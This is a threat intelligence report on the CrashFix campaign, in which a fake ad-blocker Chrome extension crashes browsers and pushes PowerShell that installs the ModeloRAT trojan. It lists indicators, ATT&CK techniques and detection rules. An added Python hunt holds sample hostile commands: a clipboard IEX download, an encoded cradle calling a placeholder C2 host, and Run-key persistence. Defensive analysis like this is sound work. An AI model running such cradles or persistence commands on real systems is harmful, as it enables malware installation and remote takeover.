CrashFix - Malicious Chrome Extension targeting Corporate Environments
BLUF
A new variant of the "ClickFix" attack, dubbed CrashFix, uses a malicious Chrome extension (NexShield) impersonating an ad blocker to crash browsers and lure users into executing malicious PowerShell commands that install ModeloRAT.
Executive Cost Summary
This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.
For organizations affected by the CrashFix malicious Chrome extension campaign targeting domain-joined corporate systems:
· Low-end total cost: $500K – $1.0M
o (limited infections, rapid containment, no confirmed data access)
· Typical expected range: $1.2M – $2.5M
o (multiple endpoints affected, credential resets, extended investigation)
· Upper-bound realistic scenarios: $3.0M – $5.0M
o (broader credential exposure, regulatory review, prolonged remediation)
Key Cost Drivers
· Number of domain-joined endpoints requiring investigation or reimaging
· Scope and privilege level of credentials exposed via infected systems
· Duration of undetected activity prior to containment
· Strength of browser extension governance and endpoint controls
· Insurance coverage terms, deductibles, and post-incident premium adjustments
Targeted Sectors
Corporate environments, specifically domain-joined systems.
Countries
· Global
Date of First Reported Activity
· Early 2025
Date of Last Reported Activity Update
· January 19, 2026
APT Names
· KongTuke
Associated Criminal Organization Names
· N/A
IOCs
Extension Name
· NexShield (impersonating uBlock Origin Lite)
Extension Chrome Web Store URL
· hxxps[://]chromewebstore[.]google[.]com/detail/nexshield-%E2%80%93-advanced-web/cpcdkmjddocikjdkbbeiaafnpdbdafmi
Developer Email
· alaynna6899@gmail.com
Associated Malware Component
· ModeloRAT (a Python-based remote access trojan)
Behavioral Indicators
· Forces unexpected browser crashes (CrashFix).
· Impersonates legitimate ad blockers.
· Uses malicious service workers.
Malware
· ModeloRAT
Tools Used in Campaign
· Malicious Chrome extensions
· PowerShell
CVEs and CVSS Vectors
· There have been no CVEs tied to this activity at this time.
Nessus ID
· No Nessus plugin IDs apply, as there are no CVEs tied to this activity at this time.
Mitigation Data
· Administrators should block the NexShield extension
· Implement strict browser extension whitelisting
Malware Names
· ModeloRAT
Malware Samples
sha256
2672B6688D7B32A90F9153D2FF607D6801E6CBDE61F509ED36D0450745998D58
Malware Name
· ModeloRAT
Malware Family
· Python-based Remote Access Trojan (RAT)
Known Decoding Key
· Uses two-layered encryption for its command-and-control (C2) communication
o Specific static keys are often obfuscated within its Python codebase to hinder analysis.
Verdict
· Malicious
o It is classified as an advanced, fully-featured backdoor targeting corporate environments.
Primary Objectives
· System Reconnaissance
o Gathering detailed information about the host and network.
· Credential and Data Theft
o Specifically targeting Active Directory environments and sensitive corporate data.
· Remote Command Execution
o Providing threat actors with full control over infected systems.
Threat Actor Context
Actor
· Attributed to KongTuke, a threat actor group active since early 2025.
Targeting
· Exclusively targets domain-joined hosts, effectively filtering out home users to focus on high-value corporate targets.
Behavior Analysis
· Infection Chain (CrashFix): Victims are lured via malicious Google Chrome extensions (e.g., NexShield, impersonating uBlock Origin Lite).
· The extension then:
o Triggers a browser crash via a denial-of-service loop.
o Prompts the user to run a "fix" (a malicious PowerShell command copied to the clipboard).
Evasion
· Employs delayed execution (triggering crashes ~1 hour after installation) and anti-analysis measures to bypass sandboxes.
Persistence
· Establishes persistence on the machine to survive reboots.
Adaptive Beaconing
Features C2 beaconing that adapts based on network connectivity status to maintain stealth.
TTPs
· T1071.001 Application Layer Protocol: Web Protocols
o The malware utilizes HTTP/HTTPS for command and control (C2) communications to blend in with legitimate web traffic.
· T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
o It establishes persistence by modifying Windows registry keys (such as HKCU\Software\Microsoft\Windows\CurrentVersion\Run) to ensure it executes automatically upon system boot.
· T1055 Process Injection
o ModeloRAT often employs process injection to execute malicious code within the memory space of a legitimate process (e.g., explorer.exe or svchost.exe) to evade detection.
· T1027 Obfuscated Files or Information
o The malware's payload and configuration files are typically encrypted or obfuscated to hinder static analysis and security software detection.
· T1113 Screen Capture
o A primary function of this RAT is the ability to capture screenshots of the victim's desktop for data collection.
· T1056.001 Input Capture: Keylogging
o It includes modules for logging keystrokes to steal sensitive information such as credentials and personal messages.
· T1005 Data from Local System
o The malware searches for and collects files and data directly from the local system's hard drive for exfiltration.
Suggested Rules / potential hunts
As a reminder, these are indicator rules. They are likely to be noisy.
For best results consider creating a data model and reviewing the traffic as a report.
Suricata
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE ModeloRAT Checkin"; flow:established,to_server; http.uri; content:"/api/v1/checkin"; classtype:trojan-activity; sid:1000001; rev:1;)
SentinelOne
Identify Browser Extensions (NexShield ID)
ObjectType = "File" AND (FilePath contains "cpcdkmjddocikjdkbbeiaafnpdbdafmi")
PowerShell Execution from Clipboard (ClickFix/CrashFix Pattern)
ObjectType = "Process" AND (ProcessName = "powershell.exe") AND (CommandLine contains "Invoke-WebRequest" OR CommandLine contains "IEX" OR CommandLine contains "-enc")
Network Communication to C2 Domains
ObjectType = "DNS" AND (DNSRequest in ("nexsnield.com"))
Splunk
index=windows sourcetype="WinEventLog:Microsoft-Windows-PowerShell/Operational" EventCode=4104 "powershell" AND ("clipboard" OR "FromBase64String")
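As an added worked hunt (not part of the original report), the Python below applies the script-block indicators from the SentinelOne and Splunk queries above (clipboard-sourced execution, IEX, download cradles, -enc payloads, Run-key persistence under T1547.001) to constructed sample 4104 script-block texts, decoding any -enc body first so a cradle hidden inside it still counts. All sample events, file paths and the indicator weights are constructed assumptions for illustration.

```python
import base64
import re
# Constructed sample 4104 script-block texts (illustrative, not real captures).
SAMPLE_EVENTS = [
    # benign administrative one-liner
    "Get-ChildItem C:\\Logs | Where-Object Length -gt 1MB",
    # CrashFix-style "fix": execute whatever the extension placed on the clipboard
    "$c = Get-Clipboard; IEX (Invoke-WebRequest -UseBasicParsing $c)",
    # encoded command whose decoded body is a download cradle
    "powershell -nop -w hidden -enc " + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/s')"
        .encode("utf-16le")).decode(),
    # persistence via the Run key named under T1547.001 (value path is constructed)
    "Set-ItemProperty 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
    "-Name upd -Value 'C:\\Users\\u\\AppData\\Roaming\\py.exe'",
]

ENC_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)  # group 1: base64 blob
# Indicator name -> (regex, weight). Weights are an assumption, not from the report.
INDICATORS = {
    "clipboard_source": (re.compile(r"Get-Clipboard|Windows\.Forms\.Clipboard", re.I), 2),
    "inline_execution": (re.compile(r"\bIEX\b|Invoke-Expression", re.I), 1),
    "download_cradle": (re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile", re.I), 1),
    "encoded_command": (ENC_RE, 1),
    "run_key_persistence": (re.compile(r"CurrentVersion\\Run\b", re.I), 2),
}

def decode_encoded_arg(script):
    """Return the UTF-16LE payload behind -enc/-EncodedCommand, or '' if absent or invalid."""
    m = ENC_RE.search(script)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return ""

def matched_indicators(script):
    """Indicator names hit by the script block, with its decoded -enc body included."""
    text = script + "\n" + decode_encoded_arg(script)
    return {name for name, (rx, _) in INDICATORS.items() if rx.search(text)}

def score_event(script):
    """Sum of the weights of the matched indicators."""
    return sum(INDICATORS[name][1] for name in matched_indicators(script))

def is_suspicious(script, threshold=2):
    """One strong or two weak indicators (two weight points) flags the event."""
    return score_event(script) >= threshold
```

Feeding real 4104 ScriptBlockText values through `is_suspicious` reproduces the Splunk hunt above but with the encoded body inspected rather than only the literal "FromBase64String" string.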
Delivery Method
· Browser-based luring via fake "fix" prompts after a forced browser crash.
Email Samples
· Not applicable
References
Security Week
· hxxps://www.securityweek.com/malicious-chrome-extension-crashes-browser-in-clickfix-variant-crashfix/
VirusTotal
· hxxps://www.virustotal.com/gui/file/2672b6688d7b32a90f9153d2ff607d6801e6cbde61f509ed36d0450745998d58